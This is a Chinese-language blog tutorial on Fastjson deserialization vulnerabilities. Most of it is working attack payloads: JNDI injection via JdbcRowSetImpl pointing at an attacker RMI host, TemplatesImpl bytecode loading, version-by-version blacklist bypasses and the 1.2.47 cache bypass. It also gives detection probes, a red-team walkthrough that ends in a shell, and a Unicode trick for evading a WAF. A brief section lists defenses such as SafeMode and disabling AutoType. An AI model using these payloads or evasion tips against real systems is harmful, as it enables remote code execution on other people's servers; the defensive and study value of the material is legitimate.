Fastjson反序列化漏洞原理与防御实践

发布时间:2026/7/21 9:40:26
Fastjson反序列化漏洞原理与防御实践 1. Fastjson基础与漏洞背景Fastjson是阿里巴巴开源的一款高性能Java JSON处理库广泛应用于Java对象与JSON字符串之间的转换。作为国内使用最广泛的JSON库之一其反序列化漏洞堪称Java安全领域的经典案例。我第一次接触Fastjson漏洞是在2019年的一次渗透测试中。当时客户系统使用的是Fastjson 1.2.24版本通过构造特殊的JSON字符串我们成功实现了远程代码执行。这个经历让我深刻认识到JSON处理库的安全问题可能带来的严重后果。Fastjson的核心功能非常简单JSON.toJSONString()将Java对象序列化为JSON字符串JSON.parseObject()将JSON字符串反序列化为Java对象但正是这个看似简单的反序列化功能在特定条件下会成为系统安全的致命弱点。下面是一个基础示例// 序列化示例 Person person new Person(张三, 25); String json JSON.toJSONString(person); // 输出: {age:25,name:张三} // 反序列化示例 String jsonStr {\age\:30,\name\:\李四\}; Person person2 JSON.parseObject(jsonStr, Person.class);2. Fastjson反序列化漏洞原理2.1 type特性与AutoType机制Fastjson的反序列化漏洞核心源于其type特性。当JSON字符串中包含type字段时Fastjson会根据该字段值实例化对应的Java类。例如{ type: com.example.EvilClass, property: value }在反序列化时Fastjson会通过反射创建com.example.EvilClass实例调用该类的setter方法设置属性值如果该类实现了特定接口还会调用相关方法这种机制本意是为了支持多态但却为攻击者提供了可乘之机。攻击者可以构造特殊的type值指向存在危险方法的Java类。2.2 典型攻击向量分析2.2.1 JdbcRowSetImpl JNDI注入com.sun.rowset.JdbcRowSetImpl是Java标准库中的一个类其setAutoCommit()方法会触发JNDI查询。构造如下JSON即可实现攻击{ type: com.sun.rowset.JdbcRowSetImpl, dataSourceName: rmi://attacker-ip/exploit, autoCommit: true }当这个JSON被反序列化时创建JdbcRowSetImpl实例调用setDataSourceName()设置恶意RMI地址调用setAutoCommit(true)触发connect()connect()中执行JNDI查询加载远程恶意类2.2.2 TemplatesImpl字节码加载另一个经典攻击方式是使用com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl类加载恶意字节码{ type: com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl, _bytecodes: [恶意类Base64编码], _outputProperties: {} }反序列化时会触发getOutputProperties()方法进而执行嵌入的恶意字节码。3. 各版本漏洞与绕过技术3.1 Fastjson ≤1.2.24这是漏洞最严重的版本AutoType默认开启且无任何防护。直接使用上述攻击向量即可利用。实战技巧使用JNDI注入时确保目标服务器能访问你的RMI/LDAP服务字节码攻击需要确保目标环境包含对应的依赖库3.2 1.2.25-1.2.41版本绕过这些版本引入了AutoType黑白名单机制但存在多种绕过方式3.2.1 L;格式绕过{ type: Lcom.sun.rowset.JdbcRowSetImpl;, dataSourceName: rmi://attacker-ip/exploit, autoCommit: true }原理Fastjson在1.2.25-1.2.41版本中对类名检查不严格Lcom.sun...;这种格式可以绕过黑名单检查。3.2.2 数组格式绕过{ type: [com.sun.rowset.JdbcRowSetImpl[{, dataSourceName: rmi://attacker-ip/exploit, autoCommit: true }3.3 1.2.42-1.2.43版本绕过这些版本修复了简单绕过但仍有方法3.3.1 双写L;绕过{ type: LLcom.sun.rowset.JdbcRowSetImpl;;, dataSourceName: rmi://attacker-ip/exploit, autoCommit: true }原理检查逻辑只去除一次L和;而类加载逻辑会递归去除。3.4 1.2.47版本缓存绕过这是最危险的绕过方式不需要开启AutoType{ a: { type: java.lang.Class, val: com.sun.rowset.JdbcRowSetImpl }, b: { type: com.sun.rowset.JdbcRowSetImpl, dataSourceName: rmi://attacker-ip/exploit, autoCommit: true } }原理第一部分将恶意类加入mapping缓存第二部分直接从缓存获取类绕过检查4. 漏洞检测与防御4.1 漏洞检测方法4.1.1 DNSLog检测{ type: java.net.Inet4Address, val: your-dnslog-url }如果收到DNS查询说明存在漏洞。4.1.2 延时检测{ type: java.lang.Thread, name: {type:java.lang.Stringaaa}, sleepTime: 5000 }如果响应延迟5秒可能存在漏洞。4.2 防御措施升级到最新版本Fastjson 1.2.68已修复已知漏洞关闭AutoTypeParserConfig.getGlobalInstance().setAutoTypeSupport(false);使用SafeMode1.2.68ParserConfig.getGlobalInstance().setSafeMode(true);自定义黑白名单ParserConfig.getGlobalInstance().addAccept(com.yourpackage.); ParserConfig.getGlobalInstance().addDeny(com.sun.);5. 实战案例与经验分享在一次红队评估中我们发现目标系统使用了Fastjson 1.2.47版本。通过以下步骤成功利用使用DNSLog确认漏洞存在搭建恶意RMI服务托管Exploit类发送精心构造的JSON请求{ a: {type:java.lang.Class,val:com.sun.rowset.JdbcRowSetImpl}, b: { type:com.sun.rowset.JdbcRowSetImpl, dataSourceName:rmi://our-server/Exploit, autoCommit:true } }成功获取系统shell关键经验内网环境中JNDI注入可能因网络隔离失效此时应优先考虑TemplatesImpl方式某些WAF会检测type字段可以尝试Unicode编码或注释绕过{\u0040type:com.sun.rowset.JdbcRowSetImpl}实际渗透中需要多次尝试不同payload因为环境配置可能影响利用成功率6. 学习资源与进阶方向对于想深入研究的同学建议搭建漏洞环境使用vulhub快速搭建测试环境不同Fastjson版本分别测试调试分析在IDEA中调试Fastjson源码重点关注ParserConfig.checkAutoType()方法扩展研究结合其他Java反序列化漏洞如Jackson、XStream研究JNDI注入的其他利用方式探索新型绕过WAF的技术Fastjson漏洞是理解Java反序列化安全的绝佳案例。通过这个漏洞的学习你不仅能掌握Fastjson本身的安全问题更能深入理解Java安全机制的薄弱环节。我在实际工作中发现很多开发人员至今仍在使用存在漏洞的Fastjson版本这为安全从业者提供了广阔的实践空间。